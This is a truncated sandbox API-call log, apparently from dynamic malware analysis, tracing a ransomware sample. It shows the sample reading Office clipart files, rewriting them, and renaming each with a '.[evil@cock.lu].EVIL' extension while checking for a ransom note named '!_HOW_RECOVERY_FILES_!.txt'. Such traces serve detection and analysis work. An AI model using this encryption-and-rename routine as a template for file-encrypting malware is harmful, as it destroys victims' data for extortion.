_wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.317] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.317] __uncaught_exception () returned 0x84b1160800 [0116.317] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.317] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf.[evil@cock.lu].evil")) returned 1 [0116.317] ??_V@YAXPEAX@Z () returned 0x1 [0117.138] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF", dwFileAttributes=0x200) returned 0 [0117.138] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0117.138] wcsstr (_Str="DD01171_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0117.138] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 69 [0117.138] wcscmp (_String1="DD01171_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0117.138] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01171_.WMF") returned 0x0 [0117.138] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 0x45 [0117.138] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0117.140] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x804, lpOverlapped=0x0) returned 1 [0117.180] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.180] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.180] _errno () returned 0x84b1160840 [0117.180] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.180] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x820, lpOverlapped=0x0) returned 1 [0117.180] CloseHandle (hObject=0x1a8) returned 1 [0117.180] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0117.181] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0117.181] __uncaught_exception () returned 0x84b1160800 [0117.181] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0117.181] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf.[evil@cock.lu].evil")) returned 1 [0117.181] ??_V@YAXPEAX@Z () returned 0x1 [0117.184] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF", dwFileAttributes=0x200) returned 0 [0117.184] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0117.184] wcsstr (_Str="DD01172_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0117.184] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 69 [0117.184] wcscmp (_String1="DD01172_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0117.184] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01172_.WMF") returned 0x0 [0117.184] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 0x45 [0117.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0117.186] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8b8, lpOverlapped=0x0) returned 1 [0117.228] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.228] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.228] _errno () returned 0x84b1160840 [0117.228] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.228] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8c0, lpOverlapped=0x0) returned 1 [0117.228] CloseHandle (hObject=0x1a8) returned 1 [0117.228] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0117.229] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0117.229] __uncaught_exception () returned 0x84b1160800 [0117.229] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0117.229] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf.[evil@cock.lu].evil")) returned 1 [0117.230] ??_V@YAXPEAX@Z () returned 0x1 [0117.232] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF", dwFileAttributes=0x200) returned 0 [0117.232] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0117.232] wcsstr (_Str="DD01173_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0117.232] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 69 [0117.232] wcscmp (_String1="DD01173_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0117.232] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01173_.WMF") returned 0x0 [0117.232] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 0x45 [0117.233] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0117.234] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x70c, lpOverlapped=0x0) returned 1 [0117.243] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.243] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.243] _errno () returned 0x84b1160840 [0117.243] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.243] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x720, lpOverlapped=0x0) returned 1 [0117.243] CloseHandle (hObject=0x1a8) returned 1 [0117.243] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0117.243] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0117.243] __uncaught_exception () returned 0x84b1160800 [0117.243] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0117.243] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf.[evil@cock.lu].evil")) returned 1 [0117.244] ??_V@YAXPEAX@Z () returned 0x1 [0117.246] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF", dwFileAttributes=0x200) returned 0 [0117.247] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0117.247] wcsstr (_Str="DD01176_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0117.247] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 69 [0117.247] wcscmp (_String1="DD01176_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0117.247] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01176_.WMF") returned 0x0 [0117.247] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 0x45 [0117.247] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0117.249] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x760, lpOverlapped=0x0) returned 1 [0117.267] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.267] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.267] _errno () returned 0x84b1160840 [0117.267] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.267] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x780, lpOverlapped=0x0) returned 1 [0117.267] CloseHandle (hObject=0x1a8) returned 1 [0117.267] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0117.267] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0117.267] __uncaught_exception () returned 0x84b1160800 [0117.267] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0117.267] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01176_.wmf.[evil@cock.lu].evil")) returned 1 [0117.268] ??_V@YAXPEAX@Z () returned 0x1 [0117.271] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01176_.WMF", dwFileAttributes=0x200) returned 0 [0117.271] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0117.271] wcsstr (_Str="DD01178_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0117.271] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 69 [0117.271] wcscmp (_String1="DD01178_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0117.271] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01178_.WMF") returned 0x0 [0117.271] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 0x45 [0117.271] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0117.273] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xed4, lpOverlapped=0x0) returned 1 [0117.303] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.303] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.303] _errno () returned 0x84b1160840 [0117.303] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.303] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xee0, lpOverlapped=0x0) returned 1 [0117.303] CloseHandle (hObject=0x1a8) returned 1 [0117.303] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0117.304] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0117.304] __uncaught_exception () returned 0x84b1160800 [0117.304] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0117.304] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01178_.wmf.[evil@cock.lu].evil")) returned 1 [0117.305] ??_V@YAXPEAX@Z () returned 0x1 [0117.307] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01178_.WMF", dwFileAttributes=0x200) returned 0 [0117.307] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0117.307] wcsstr (_Str="DD01179_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0117.307] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 69 [0117.307] wcscmp (_String1="DD01179_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0117.307] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01179_.WMF") returned 0x0 [0117.308] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 0x45 [0117.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0117.309] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7e8, lpOverlapped=0x0) returned 1 [0117.311] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.311] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0117.311] _errno () returned 0x84b1160840 [0117.312] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.312] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x800, lpOverlapped=0x0) returned 1 [0117.312] CloseHandle (hObject=0x1a8) returned 1 [0117.312] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0117.312] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0117.312] __uncaught_exception () returned 0x84b1160800 [0117.312] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0117.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01179_.wmf.[evil@cock.lu].evil")) returned 1 [0117.313] ??_V@YAXPEAX@Z () returned 0x1 [0117.315] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01179_.WMF", dwFileAttributes=0x200) returned 0 [0117.315] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0117.316] wcsstr (_Str="DD01180_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0117.316] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 69 [0117.316] wcscmp (_String1="DD01180_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0117.316] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01180_.WMF") returned 0x0 [0117.316] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 0x45 [0117.316] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0117.317] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x824, lpOverlapped=0x0) returned 1 [0118.002] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0118.002] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0118.002] _errno () returned 0x84b1160840 [0118.002] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.002] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x840, lpOverlapped=0x0) returned 1 [0118.002] CloseHandle (hObject=0x1a8) returned 1 [0118.003] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0118.003] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0118.003] __uncaught_exception () returned 0x84b1160800 [0118.003] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0118.003] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01180_.wmf.[evil@cock.lu].evil")) returned 1 [0118.004] ??_V@YAXPEAX@Z () returned 0x1 [0118.006] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01180_.WMF", dwFileAttributes=0x200) returned 0 [0118.007] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0118.007] wcsstr (_Str="DD01181_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0118.007] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 69 [0118.007] wcscmp (_String1="DD01181_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0118.007] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01181_.WMF") returned 0x0 [0118.007] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 0x45 [0118.007] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0118.008] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5a8, lpOverlapped=0x0) returned 1 [0119.505] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.505] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0119.505] _errno () returned 0x84b1160840 [0119.505] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.505] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c0, lpOverlapped=0x0) returned 1 [0119.505] CloseHandle (hObject=0x1a8) returned 1 [0119.505] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0119.505] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0119.505] __uncaught_exception () returned 0x84b1160800 [0119.505] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0119.506] MoveFileW 